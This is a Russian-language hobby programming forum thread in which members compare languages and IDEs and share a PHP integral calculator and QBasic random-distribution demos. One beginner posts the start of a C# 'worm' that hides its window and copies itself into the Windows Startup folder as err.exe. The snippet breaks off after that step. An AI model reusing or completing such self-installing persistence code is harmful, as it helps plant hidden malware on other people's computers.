здрасте все, кто сюда забрёл всем форумчанам предлагаю поучаствовать в этой теме
мне хотелось бы, чтобы любители программирования (надеюсь таковые найдутся) поделились своим опытом друг с другом, а так же привлекали новичков в свои ряды.
ещё неплохо было бы если бы вы написали, на чём вы программируете и в чём достоинства вашего языка или компилятора.
я недавно начал программировать на C#. компилятор SharpDevelop 3.2 мне нравится этот компилятор, очень удобный интерфейс, доступ к свойствам объектов открывается через точку, так же сразу создается ехе-файл, который готов к употреблению)
до этого писал простенькие программки типа калькулятора) щас представляю на ваш суд код своего червячка))
показать офф-топ
using System; using System.Collections.Generic; using System.Drawing; using System.Windows.Forms; using Microsoft.Win32; using System.IO; using System.Diagnostics; using System.Resources;
namespace a { public partial class MainForm : Form { public MainForm() { Opacity = 0; //InitializeComponent(); string my_program_path = Application.ExecutablePath.ToString(); //путь к нашей проге string executable_file_path = "c:/documents and settings/all users/главное меню/программы/автозагрузка/err.exe"; //будущий путь к нашему вирусу
//копирование вируса в автозагрузку if (!File.Exists(executable_file_path)) File.Copy(my_program_path, executable_file_path);
Когда программировал на Unity Javascript, пришлось его выучить =D Сейчас, так как занимаюсь Саурсом, приходится программировать на C++. Слава богу есть средние знания, по крайней мере могу понять, где ошибка, с лёгкостью читать исходники =D
Из: Soviet Empire
Раньше с легкостью программировал на VB 6 и паскале, учился работать на с++ и с++.net , но егэ и прочие дела мешают заниматься программированием как хобби.
Использую майкрософт висуал студио - 8ую для с++ и какую то 99 года для VB 6
Ох ну и тема Программирую на QBasic, TPascal, C++, C#, есть проекты на Java (надо было написать, сам язык я не учил). Ну и традиционное PHP, JS и т.п. Лучше всего знаю PHP и C++. Проще всего программировать на C#, по-моему. Из сред использую Visual Studio 2008 и Borland Pascal 7 и MS QB1.0.
Что-нибудь показать... Ну на php написал вот это http://fs.xtud.ru/ и вот это http://math.xtud.ru/ . На C++ написал вот это, просто демонстрация классов и наследований. Так, что еще... На паскале и басике ниче не хочу показывать, это детсад, у меня на форуме 25 страниц басикного кода, и это еще не считая удаленных сообщений, а то так было бы все 50.
В догонку хочу сказать, что программировать на чистом C# бессмысленно, любой программист C# должен уметь использовать .net библиотеки и знать об их функциях и возможностях, и очень желательно графику.
Какие мысли по этому поводу? Ненавижу задротство с типами данных в C++ ограниченность библиотеки math.h в вопросах работы с системами счисления.
Из: Soviet Empire
Ну дак их писали разные люди для разных целей и каждый считает(ну наверняка) что его язык лучше(я знаю только 3 разных компилятора с++ а их скорее всего больше), другое дело что язык может устареть и потому сравнить паскаль и визуал С нельзя, ну только если синтаксис.
Другое обьяснение: вот скажем VB придуман специально для того что бы писали программы для виндоус, и он в люниске работать не будет.
Затем языки для веб технологий на с++ сайты не пишут а вот на PHP пишут
И так можно продолжать долго. Короче говоря каждый язык создан для своей ниши с целью переплюнуть конкурентов, или для того что бы упростить процесс создания программ(но и это селано что бы переплюнуть конкурентов XD)
я пока ещё только начинающий программист, и буду очень рад сотрудничеству я тут нашёл штуковину "индусский код"=) такая тема прикольная вот ссылка больше всего радует пример №4 и ещё быдлокод на C++, где заменяются команды языка на свои) и пишешь в свободном стиле кстати этот код компилируется и исполняется (считает элементы массива, и ещё чё-то...) быдлокод прикрепляю в файле, потому что там много мата))) компилятор нашего форума не одобрит)
Круть а мы сейчас в коледже Делфи проходим,ты как на счет Делфи 7?
честно говоря никак) мы прошли С++ и С#-немного... у нас препод пишет проги на C# в основном. ночами работает, на парах спит. в школе проходил Q-Basic и Turbo Pascal паскаль прошел мимо))) да и бейсик уже плохо помню)
=) прикольно. эт ты типа для каждого значения х считал значение функции и умножал на шаг, потом складывал?)) это на PHP сделано? просто вроде это можно сделать ещё точнее стандартными средствами языка, по крайней мере я думаю в си это можно реализовать...
у меня завтра как раз экзамен по статистике) там есть вопрос об интервальных статистических рядах... такая муть..
=) прикольно. эт ты типа для каждого значения х считал значение функции и умножал на шаг, потом складывал?))это на PHP сделано? просто вроде это можно сделать ещё точнее стандартными средствами языка, по крайней мере я думаю в си это можно реализовать...
На си есть стандартная функция вычисления определенного интеграла, это понятно. Но в PHP нет никаких средств для решения интегралов, вот и приходится методом трапеций считать. Конечно, можно найти первообразную, но это задротство.
echo '<div class="topinfo"><b>Внимание: </b>функция степени пишется как pow(основание, степень). Если интеграл не решается, нажать <a href="./fix.php">сюда</a> и попробовать снова! Если интеграл все равно не считается (в случае если пределы интегрирования отличаются значительно, поставьте меньшую точность.</div><br>';
Кстати вдогонку насчет индусского программирования. Вот вам прога, где идет генерация из одного RND, то есть обычная ситуация:
показать офф-топ
Код
CLS RANDOMIZE TIMER DIM a(10) INPUT "Vvesti N: ", n FOR j = 1 TO n x = INT(RND * 10 + 1) a(x) = a(x) + 1 NEXT j FOR i = 1 TO 10 PRINT i; "("; a(i); ")", " = "; FOR j = 1 TO INT(a(i) / n * 100) PRINT "#"; NEXT j PRINT NEXT i
А вот прога, где идет то что упомянуто в статье, то есть (RND+RND+RND)/3:
показать офф-топ
Код
CLS RANDOMIZE TIMER DIM a(10) INPUT "Vvesti N: ", n FOR j = 1 TO n x = INT((RND + RND + RND) / 3 * 10 + 1) a(x) = a(x) + 1 NEXT j FOR i = 1 TO 10 PRINT i; "("; a(i); ")", " = "; FOR j = 1 TO INT(a(i) / n * 100) PRINT "#"; NEXT j PRINT NEXT i
Для тех кто в танке, N = количество проходов, имеет смысл ставить значение 1000...1000000, лучше конечно миллион.
Обратите внимание на распределение случайной величины в зависимости от одного рандомайза, и трех. Вывод очевиден - при одном видим равномерное распределение, при трех - нормальное. Но это в QBasic, в C++ сделаю такое чуть попозже...
Вот такие пироги. Так что если кто-то из вас умеет программировать, вперед проверять гипотезу о нормальном распределении среднеарифметического трех случайных.
Верно, он никому не нужен. Но что бы понять основы, он подойдёт.
Нет, он дает дурные привычки типа не надо инициализировать переменные значениями. Дело ваше, я не рекомендую начинать с паскаля. С++ лучше для новичков и профессионалов. Это базовый язык современности.